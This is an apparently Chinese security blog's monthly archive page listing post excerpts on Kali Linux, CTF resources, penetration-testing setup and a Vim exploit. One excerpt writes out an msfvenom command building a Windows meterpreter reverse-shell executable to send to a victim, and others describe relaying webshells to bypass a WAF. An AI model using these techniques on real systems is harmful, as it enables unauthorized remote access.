06 2019 档案

博客园主题美化只需要这几步
摘要:博客园美化主题需要这几步 本人现用的这套博皮是根据bndong的博客进行修改的,且配置需要时间,有兴趣可以直接访问bndong博客,查看置顶博文进行配置。所有的修改都在博客园后台管理 >设置中,其中js的权限是要申请的。 配置期间如有不懂之处,欢迎随时评论! 我的博客皮肤 【美化方法】 安装配置 本 阅读全文
posted @ 2019-06-22 14:07 xyongsec 阅读(506) 评论(0) 推荐(0)
Kali-利用metasploit中的exploit/multi/handler进行攻击
摘要:在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台将软件发给客户机上运行,此时ka 阅读全文
posted @ 2019-06-22 13:41 xyongsec 阅读(3094) 评论(0) 推荐(0)
CTF干货合集
摘要:CTF练习平台 http://hackinglab.cn/ 网络信息安全攻防学习平台 http://captf.com/ ctf题目 http://oj.xctf.org.cn/ XCTF_OJ练习平台 http://ctf.3sec.cn/ Jlu.CTF http://www.baimaoxue 阅读全文
posted @ 2019-06-22 13:40 xyongsec 阅读(1155) 评论(0) 推荐(0)
CTF练习资源大全集
摘要:练习CTF清单/永久CTF清单 以下列出了一些长期运行的CTF实践站点和工具或CTF。谢谢,RSnake用于启动这是基于的原始版本。如果您有任何更正或建议,请随时通过dot com tld在域psifertex上发送电子邮件至ctf。 在线直播游戏推荐 无论是更新,包含高质量的挑战,还是只是有很多深 阅读全文
posted @ 2019-06-22 13:39 xyongsec 阅读(4264) 评论(0) 推荐(0)
丢给你一个txt并同时获取你shell
摘要:丢给你一个txt并同时获取你shell 0x00:回顾 《文本编辑器Vim/Neovim被曝任意代码执行漏洞》 听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。 git clone https://github.com/numirias/ 阅读全文
posted @ 2019-06-22 13:15 xyongsec 阅读(550) 评论(0) 推荐(0)
Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装
摘要:Kali Linux Web渗透测试手册(第二版) - 1.3 - 靶机的安装 一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web 阅读全文
posted @ 2019-06-22 13:09 xyongsec 阅读(3428) 评论(0) 推荐(0)
Kali Linux Web渗透测试手册(第二版) - 1.0 - 渗透测试环境搭建
摘要:一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: 在Windows和Linux上安装VirtualBox 创建一个Kali Linux虚拟机 更新和升级Kali Linux 为渗透测试配置web浏览器 创建一个属于自己的靶机 为正确的通信配置虚拟机 了解易受攻击的虚拟机上的 阅读全文
posted @ 2019-06-22 12:50 xyongsec 阅读(2975) 评论(2) 推荐(0)
火眼推出Windows免费渗透测试套件,包含140多款工具
摘要:火眼推出Windows免费渗透测试套件,包含140多款工具 火眼推出Windows免费渗透测试套件,包含140多款工具 火眼推出Windows免费渗透测试套件,包含140多款工具 2019年3月28日,火眼发布了一个包含超过140个开源Windows渗透工具包,红队渗透测试员和蓝队防御人员均拥有了顶 阅读全文
posted @ 2019-06-22 11:07 xyongsec 阅读(1872) 评论(0) 推荐(0)
Centos7安装Typecho详细教程
摘要:Centos7安装Typecho详细教程 首先搭建LAMPH环境 L linux 服务器(centos或者ubunt) 、A Apache 、M mysql 、P PHP 安装Apache、PHP、Mysql、连接Mysql数据库的包: yum -y install httpd php-mysql 阅读全文
posted @ 2019-06-22 10:45 xyongsec 阅读(6952) 评论(0) 推荐(1)
Liunx 安装 Nessus
摘要:Liunx 安装 Nessus 啥子是Nessus 它是一款系统漏洞扫描与分析软件,可以扫描服务器存在哪些漏洞,页面简介美观,非常Nice。 获取激活码 首先访问如下网站 https://www.tenable.com/products/nessus/activation-code 点Registe 阅读全文
posted @ 2019-06-22 10:39 xyongsec 阅读(461) 评论(0) 推荐(0)
攻防世界 web进阶练习 NewsCenter
摘要:攻防世界 web进阶练习 NewsCenter 题目是NewsCenter,没有提示信息。打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入,随便输入一个abc,没有任何搜索结果,页面也没有什么变化,考虑SQL注入。随便输入234234234,用burp抓包,发现是post方式,直接用sqlm 阅读全文
posted @ 2019-06-22 10:36 xyongsec 阅读(2681) 评论(0) 推荐(0)
针对Linux 文件完整性监控的实现
摘要:针对Linux 文件完整性监控的实现 摘要 计算机和互联网是20世纪以来最伟大的发明之一,随着计算机技术的不断发展,人们的生活方式发生了巨大的变化。计算机和互联网的发展给人们的生产生活带来了极大的便利,但同时也存在一定的安全隐患。在人们借助互联网展开一系列活动的时候,个人信息和交易信息就会在网络中储 阅读全文
posted @ 2019-06-22 10:34 xyongsec 阅读(2952) 评论(0) 推荐(0)
ParrotSec 中文社区 QQ群认证 Openssl解密
摘要:ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 ParrotSec 中文社区 QQ群认证 Openssl解密 下载Key.txt 打开parrot 系统,复制文件 阅读全文
posted @ 2019-06-22 10:32 xyongsec 阅读(553) 评论(0) 推荐(0)
中转Webshell 绕过安全狗(二)
摘要:前言 在实践中转webshell绕过安全狗(一)中,在服务端和客户端均为php。某大佬提示并分享资源后,打算使用python完成中转。部分代码无耻copy。 客户端 本地127.0.0.1,安装python2phpshellproxy.py 运行需要安装 服务端 shell端192.168.253. 阅读全文
posted @ 2019-06-21 16:30 xyongsec 阅读(392) 评论(0) 推荐(0)
中转Webshell 绕过安全狗(一)
摘要:前言 听说中国菜刀里有后门。抓包我是没有监测到异常数据包。为了以防万一,且更好使用中国菜刀硬杠安全狗。笔者收集了一下资料。无耻的copy大佬的源码,只是在大佬的基础上简单修改了一下,达到Webshell绕过安全狗。原理 菜刀不直接向shell发送数据,而是发送到中转的一个页面上,这个页面对接收的参数 阅读全文
posted @ 2019-06-21 16:26 xyongsec 阅读(910) 评论(0) 推荐(0)
Kali Linux Web渗透测试手册(第二版) - 1.1 - Firefox浏览器下安装一些常用的插件
摘要:一.配置KALI Linux和渗透测试环境 在这一章,我们将覆盖以下内容: l 在Windows和Linux上安装VirtualBox l 创建一个Kali Linux虚拟机 l 更新和升级Kali Linux l 为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件) l 创建 阅读全文
posted @ 2019-06-21 13:49 xyongsec 阅读(696) 评论(0) 推荐(0)